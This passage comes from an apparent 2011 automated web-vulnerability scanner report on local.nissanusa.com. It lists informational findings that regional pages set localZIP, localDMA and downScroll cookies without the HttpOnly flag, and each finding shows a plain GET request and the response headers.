Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=02201; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/
Set-Cookie: localDMA=boston-area; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/
Content-Length: 155520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.401. http://local.nissanusa.com/chicago-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /chicago-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /chicago-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:51:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:51:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=60601; expires=Sat, 05-Feb-2011 04:51:58 GMT; path=/
Set-Cookie: localDMA=chicago-area; expires=Sat, 05-Feb-2011 04:51:58 GMT; path=/
Content-Length: 139873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.402. http://local.nissanusa.com/cincinnati-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /cincinnati-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cincinnati-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=45201; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/
Set-Cookie: localDMA=cincinnati-area; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/
Content-Length: 125013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.403. http://local.nissanusa.com/cleveland-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /cleveland-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cleveland-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=44101; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/
Set-Cookie: localDMA=cleveland-area; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/
Content-Length: 116578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.404. http://local.nissanusa.com/columbus-oh-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /columbus-oh-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /columbus-oh-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=43215; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Set-Cookie: localDMA=columbus-oh-area; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Content-Length: 116057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.405. http://local.nissanusa.com/dallas-ft-worth-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /dallas-ft-worth-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dallas-ft-worth-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=75201; expires=Sat, 05-Feb-2011 04:53:19 GMT; path=/
Set-Cookie: localDMA=dallas-ft-worth-area; expires=Sat, 05-Feb-2011 04:53:19 GMT; path=/
Content-Length: 118245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.406. http://local.nissanusa.com/denver-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /denver-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /denver-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:54:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:54:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=80201; expires=Sat, 05-Feb-2011 04:54:11 GMT; path=/
Set-Cookie: localDMA=denver-area; expires=Sat, 05-Feb-2011 04:54:11 GMT; path=/
Content-Length: 115525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.407. http://local.nissanusa.com/harlingen-brownsville-tx-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /harlingen-brownsville-tx-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /harlingen-brownsville-tx-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:54:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:54:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=78550; expires=Sat, 05-Feb-2011 04:54:14 GMT; path=/
Set-Cookie: localDMA=harlingen-brownsville-tx-area; expires=Sat, 05-Feb-2011 04:54:14 GMT; path=/
Content-Length: 104990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.408. http://local.nissanusa.com/harrisburg-lancaster-pa-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /harrisburg-lancaster-pa-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /harrisburg-lancaster-pa-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=17101; expires=Sat, 05-Feb-2011 04:52:55 GMT; path=/
Set-Cookie: localDMA=harrisburg-lancaster-pa-area; expires=Sat, 05-Feb-2011 04:52:55 GMT; path=/
Content-Length: 166681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.409. http://local.nissanusa.com/hartford-new-haven-ct-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /hartford-new-haven-ct-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hartford-new-haven-ct-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=06101; expires=Sat, 05-Feb-2011 04:53:01 GMT; path=/
Set-Cookie: localDMA=hartford-new-haven-ct-area; expires=Sat, 05-Feb-2011 04:53:01 GMT; path=/
Content-Length: 203647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.410. http://local.nissanusa.com/honolulu-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /honolulu-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /honolulu-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=96801; expires=Sat, 05-Feb-2011 04:57:29 GMT; path=/
Set-Cookie: localDMA=honolulu-area; expires=Sat, 05-Feb-2011 04:57:29 GMT; path=/
Content-Length: 107900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.411. http://local.nissanusa.com/houston-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /houston-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /houston-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=77001; expires=Sat, 05-Feb-2011 04:53:28 GMT; path=/
Set-Cookie: localDMA=houston-area; expires=Sat, 05-Feb-2011 04:53:28 GMT; path=/
Content-Length: 114259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.412. http://local.nissanusa.com/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

downScroll

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.html HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:58:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:58:46 GMT
Content-Length: 15991
Connection: close
Set-Cookie: downScroll=deleted; expires=Fri, 29-Jan-2010 04:58:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

11.413. http://local.nissanusa.com/indianapolis-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /indianapolis-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

downScroll
localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /indianapolis-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: downScroll=deleted; expires=Fri, 29-Jan-2010 04:52:08 GMT
Set-Cookie: localZIP=46201; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Set-Cookie: localDMA=indianapolis-area; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Content-Length: 111740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.414. http://local.nissanusa.com/jacksonville-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /jacksonville-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jacksonville-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=32201; expires=Sat, 05-Feb-2011 04:56:16 GMT; path=/
Set-Cookie: localDMA=jacksonville-area; expires=Sat, 05-Feb-2011 04:56:16 GMT; path=/
Content-Length: 116343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.415. http://local.nissanusa.com/las-vegas-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /las-vegas-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /las-vegas-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=89101; expires=Sat, 05-Feb-2011 04:56:53 GMT; path=/
Set-Cookie: localDMA=las-vegas-area; expires=Sat, 05-Feb-2011 04:56:53 GMT; path=/
Content-Length: 107986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.416. http://local.nissanusa.com/little-rock-pine-bluff-ar-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /little-rock-pine-bluff-ar-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /little-rock-pine-bluff-ar-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
